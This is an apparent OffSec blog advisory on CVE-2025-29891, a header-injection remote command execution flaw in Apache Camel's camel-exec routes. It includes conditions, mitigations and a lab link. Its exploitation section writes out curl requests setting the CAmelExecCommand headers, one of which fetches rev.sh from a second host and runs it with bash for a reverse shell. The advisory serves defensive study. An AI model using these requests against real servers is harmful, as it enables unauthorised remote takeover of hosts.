Home OffSec
  • Pricing
Blog

/

CVE-2025-29891 – Apache Camel Exploit via CAmelExecCommandArgs Header Injection

Research & Tutorials

Aug 8, 2025

CVE-2025-29891 – Apache Camel Exploit via CAmelExecCommandArgs Header Injection

Discover how CVE-2025-29891 impacts Apache Camel via CAmelExecCommandArgs header injection. Learn how attackers exploit this misconfiguration for remote code execution and how to secure your systems.

OffSec Team OffSec Team

2 min read

Overview

CVE-2025-29891 is a remote command injection vulnerability found in Apache Camel’s HTTP endpoints when misconfigured. The flaw arises from insecure usage of the CAmelExecCommandExecutable and CAmelExecCommandArgs headers, which can be exploited to execute arbitrary commands. It affects systems where the attacker can interact with HTTP-exposed Camel routes, particularly if security hardening is weak or missing. A similar vulnerability was previously detailed by OffSec in our blog post on CVE-2025-27636.

  • CVE ID: CVE-2025-29891
  • Severity: Medium
  • CVSS Score: 4.8
  • EPSS Score: 0.24%
  • Impact: Remote Code Execution
  • Attack Vector: Network
  • Authentication Required: No
  • Vulnerable Component: camel-exec route in Apache Camel

Technical Breakdown

Apache Camel supports route execution via headers. When using the camel-exec component, it allows execution of system commands through HTTP requests that set:

  • CAmelExecCommandExecutable – the binary to run (e.g., curl, bash)
  • CAmelExecCommandArgs – arguments passed to the binary

If the system exposes HTTP endpoints with the camel-exec component and does not filter or validate these headers, an attacker can leverage them to execute arbitrary commands on the host system.


Conditions for Exploitation

  • The Apache Camel instance must expose an HTTP endpoint utilizing camel-exec.
  • The attacker must be able to send crafted HTTP requests to the endpoint.
  • Headers CAmelExecCommandExecutable and CAmelExecCommandArgs must not be filtered or sanitized.

Exploitation

A route misconfiguration exposing this logic over HTTP can be weaponized to issue commands remotely. This behavior becomes critical when paired with web-accessible endpoints such as /api/system-version.

For example, a simple sleep command:

curl --header "CAmelExecCommandExecutable: sleep" \
     --header "CAmelExecCommandArgs: 5" \
     http://192.168.56.80:8080/api/system-version

Or for full remote command execution with a reverse shell:

curl --header "CAmelExecCommandExecutable: curl" \
     --header "CAmelExecCommandArgs: 192.168.18.5:3333/rev.sh -o /tmp/rev.sh | bash /tmp/rev.sh" \
     http://192.168.56.80:8080/api/system-version

The headers are interpreted and executed directly on the host, enabling full shell access if the server allows outbound connections.

Try Hands-On
You can try exploiting this vulnerability in a controlled environment via the OffSec lab for CVE-2025-29891.

Mitigation

  • Do not expose camel-exec routes over publicly accessible endpoints.
    Validate and sanitize headers and inputs before invoking command execution.
  • Use proper authentication and authorization around sensitive routes.
  • Consider disabling or removing the camel-exec component unless absolutely required.
  • Upgrade Apache Camel to a patched version if one is released for this CVE.
  • Restrict outbound access from the server to prevent reverse shells or external payload fetching.

References

Stay in the know: Become an OffSec Insider

Stay in the know: Become an OffSec Insider

Get the latest updates about resources, events & promotions from OffSec!

Latest from OffSec